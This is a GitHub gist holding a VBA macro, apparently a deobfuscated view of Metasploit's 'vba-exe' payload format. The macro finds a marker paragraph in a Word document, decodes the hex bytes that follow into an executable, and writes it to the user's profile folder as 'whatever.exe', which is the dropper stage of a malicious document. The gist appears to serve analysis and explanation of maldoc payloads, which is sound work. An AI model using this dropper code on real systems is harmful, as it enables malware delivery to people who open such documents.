-
-
Save cryptonic01/8bff5551f2afae28b9adcfdd40f917a7 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ' This is a deobfuscated view of the 'vba-exe' output format of metasploit payload | |
| ' | |
| ' This macro searches for a marker paragraph, namely "marker" in the example below | |
| ' and then loads all paragraphs coming next, as a sequence of bytes, then saves it to | |
| ' a local file. | |
| ' | |
| ' Example, in the word document: | |
| ' marker | |
| ' &H4d&H5a&H90&H00&H03&H00&H00&H00&H04&H00&H00&H00 .... | |
| Sub DecodeAndSaveEmbeddedFile() | |
| Dim p As Paragraph | |
| Dim Text As String | |
| Dim MarkerFound As Boolean | |
| Dim Counter As Integer | |
| Dim FileHandle As Integer | |
| Dim b As Byte | |
| Dim UserProfile As String | |
| UserProfile = Environ("USERPROFILE") | |
| FileHandle = FreeFile() | |
| Open UserProfile + "\whatever.exe" For Binary As FileHandle | |
| For Each p In ActiveDocument.Paragraphs | |
| DoEvents | |
| Text = p.Range.Text | |
| If (MarkerFound = True) Then | |
| Counter = 1 | |
| While (Counter < Len(Text)) | |
| b = Mid(Text, Counter, 4) | |
| Put #FileHandle, , b | |
| Counter = Counter + 4 | |
| Wend | |
| ElseIf (InStr(1, Text, "marker") > 0 And Len(Text) > 0) Then | |
| MarkerFound = True | |
| End If | |
| Next | |
| Close #FileHandle | |
| End Sub |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment